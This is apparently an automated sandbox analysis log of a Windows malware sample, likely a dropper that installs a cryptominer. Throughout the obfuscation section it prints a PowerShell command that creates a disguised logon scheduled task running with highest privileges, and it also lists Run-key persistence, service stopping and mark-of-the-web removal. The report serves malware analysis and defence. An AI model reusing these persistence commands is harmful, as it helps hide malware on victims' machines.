                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: iphlpapi.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: powrprof.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: umpdc.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: mswsock.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc6.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: dhcpcsvc.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: dnsapi.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: napinsp.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: pnrpnsp.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: wshbth.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: nlaapi.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: winrnr.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: rasadhlp.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: fwpuclnt.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\dwm.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                                Source: C:\Users\user\Desktop\Us051y7j25.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                                Source: Window RecorderWindow detected: More than 3 window changes detected
                                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                                Source: C:\Users\user\Desktop\Us051y7j25.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.9625_none_508ef7e4bcbbe589\MSVCR90.dllJump to behavior
                                Source: Us051y7j25.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                Source: Binary string: symbols\dll\System.Management.Automation.pdb source: powershell.exe, 0000001E.00000002.2890862563.000000D1C3D46000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: XC:\Windows\System.Management.Automation.pdb0 source: powershell.exe, 0000001E.00000002.2890862563.000000D1C3D46000.00000004.00000010.00020000.00000000.sdmp
                                Source: Binary string: d:\hotproject\winring0\source\dll\sys\lib\amd64\WinRing0.pdb source: winupsecvmgr.exe, 00000022.00000002.3142710101.00007FF7AD1CB000.00000004.00000001.01000000.00000010.sdmp
                                Source: Binary string: n.pdb{ source: powershell.exe, 0000001E.00000002.2937156312.0000025221AB2000.00000004.00000020.00020000.00000000.sdmp
                                Source: Us051y7j25.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                Source: Us051y7j25.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                Source: Us051y7j25.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                Source: Us051y7j25.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                Source: Us051y7j25.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

                                Data Obfuscation

                                barindex
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\AppData\Local\Temp\1239611256.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#ydcfdz#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#evrkcgqew#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'Microsoft Windows Security' /tr '''C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\Microsoft Windows Security\winupsecvmgr.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'Microsoft Windows Security' -RunLevel 'Highest' -Force; }
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCode function: 0_2_001410B0 Sleep,DeleteFileW,CopyFileW,FindWindowA,MoveFileW,DeleteFileW,CopyFileW,FindWindowA,MoveFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_001410B0
                                Source: sysppvrdnvs.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x232cd
                                Source: 1091722296.exe.4.drStatic PE information: real checksum: 0x6517 should be: 0x659f
                                Source: jacrzswcvuml.tmp.34.drStatic PE information: real checksum: 0x0 should be: 0x554c2a
                                Source: 1881231804.exe.4.drStatic PE information: real checksum: 0x0 should be: 0xa6a9
                                Source: 21324.scr.0.drStatic PE information: real checksum: 0x0 should be: 0x232cd
                                Source: tdrpl[1].exe.0.drStatic PE information: real checksum: 0x0 should be: 0x232cd
                                Source: nxmr[1].exe.27.drStatic PE information: section name: .xdata
                                Source: 1239611256.exe.27.drStatic PE information: section name: .xdata
                                Source: winupsecvmgr.exe.28.drStatic PE information: section name: .xdata
                                Source: jacrzswcvuml.tmp.34.drStatic PE information: section name: _RANDOMX
                                Source: jacrzswcvuml.tmp.34.drStatic PE information: section name: _TEXT_CN
                                Source: jacrzswcvuml.tmp.34.drStatic PE information: section name: _TEXT_CN
                                Source: jacrzswcvuml.tmp.34.drStatic PE information: section name: _RDATA
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCode function: 0_2_00141CC1 push ecx; ret 0_2_00141CD4
                                Source: C:\Users\user\AppData\Local\Temp\2314627202.exeCode function: 26_2_00871821 push ecx; ret 26_2_00871834
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeCode function: 27_2_00601AD1 push ecx; ret 27_2_00601AE4
                                Source: C:\Users\user\AppData\Local\Temp\146916724.exeCode function: 29_2_00C91771 push ecx; ret 29_2_00C91784
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFD3467D2A5 pushad ; iretd 30_2_00007FFD3467D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFD347900BD pushad ; iretd 30_2_00007FFD347900C1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 30_2_00007FFD34797B8A push eax; ret 30_2_00007FFD34797B99
                                Source: C:\Windows\System32\conhost.exeCode function: 37_2_00007FF7B89C25AC push rsi; ret 37_2_00007FF7B89C25C6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD3465D2A5 pushad ; iretd 38_2_00007FFD3465D2A6
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD3477B8FA pushad ; iretd 38_2_00007FFD3477B969
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD3477754D push ebx; iretd 38_2_00007FFD3477756A
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD347700BD pushad ; iretd 38_2_00007FFD347700C1
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD34773AD3 pushad ; ret 38_2_00007FFD34773AD9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD34777B9A push eax; ret 38_2_00007FFD34777BA9
                                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 38_2_00007FFD34777BD3 push eax; ret 38_2_00007FFD34777BA9

                                Persistence and Installation Behavior

                                barindex
                                Source: C:\Users\user\Desktop\Us051y7j25.exeFile created: C:\Users\user\AppData\Local\Temp\21324.scrJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrExecutable created and started: C:\Windows\sysppvrdnvs.exeJump to behavior
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sys
                                Source: C:\Users\user\Desktop\Us051y7j25.exeCode function: 0_2_001410B0 Sleep,DeleteFileW,CopyFileW,FindWindowA,MoveFileW,DeleteFileW,CopyFileW,FindWindowA,MoveFileW,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetTickCount,srand,mbstowcs,mbstowcs,wsprintfW,wsprintfW,PathFileExistsW,mbstowcs,mbstowcs,rand,wsprintfW,mbstowcs,mbstowcs,URLDownloadToFileW,ShellExecuteW,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,FreeLibrary,0_2_001410B0
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrFile created: C:\Windows\sysppvrdnvs.exeJump to dropped file
                                Source: C:\Windows\sysppvrdnvs.exeFile created: C:\Users\user\AppData\Local\Temp\2314627202.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1239611256.exeFile created: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeJump to dropped file
                                Source: C:\Windows\sysppvrdnvs.exeFile created: C:\Users\user\AppData\Local\Temp\1091722296.exeJump to dropped file
                                Source: C:\Windows\sysppvrdnvs.exeFile created: C:\Users\user\AppData\Local\Temp\1881231804.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\6ATIQPJI\nxmr[1].exeJump to dropped file
                                Source: C:\Users\user\Desktop\Us051y7j25.exeFile created: C:\Users\user\AppData\Local\Temp\21324.scrJump to dropped file
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Local\Temp\jacrzswcvuml.tmpJump to dropped file
                                Source: C:\Users\user\Desktop\Us051y7j25.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\tdrpl[1].exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\1091722296.exeFile created: C:\Users\user\AppData\Local\Temp\1239611256.exeJump to dropped file
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeFile created: C:\Users\user\AppData\Roaming\Google\Libs\WR64.sysJump to dropped file
                                Source: C:\Windows\sysppvrdnvs.exeFile created: C:\Users\user\AppData\Local\Temp\146916724.exeJump to dropped file
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrFile created: C:\Windows\sysppvrdnvs.exeJump to dropped file

                                Boot Survival

                                barindex
                                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\schtasks.exe schtasks /delete /f /tn "Windows Upgrade Manager"
                                Source: C:\Windows\sysppvrdnvs.exeRegistry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\BITSJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Windows SettingsJump to behavior
                                Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\sc.exe sc stop UsoSvc

                                Hooking and other Techniques for Hiding and Protection

                                barindex
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JACRZSWCVUML.TMP
                                Source: C:\Users\user\Microsoft Windows Security\winupsecvmgr.exeModule Loaded: C:\USERS\user\APPDATA\LOCAL\TEMP\JACRZSWCVUML.TMP
                                Source: C:\Users\user\AppData\Local\Temp\21324.scrFile opened: C:\Users\user\AppData\Local\Temp\21324.scr:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Windows\sysppvrdnvs.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\1082429028.exe:Zone.Identifier read attributes | deleteJump to behavior
                                Source: C:\Windows\sysppvrdnvs.exeFile opened: C:\Users\user\AppData\Local\Temp\3336719498.exe:Zone.Identifier read attributes | deleteJump to behavior
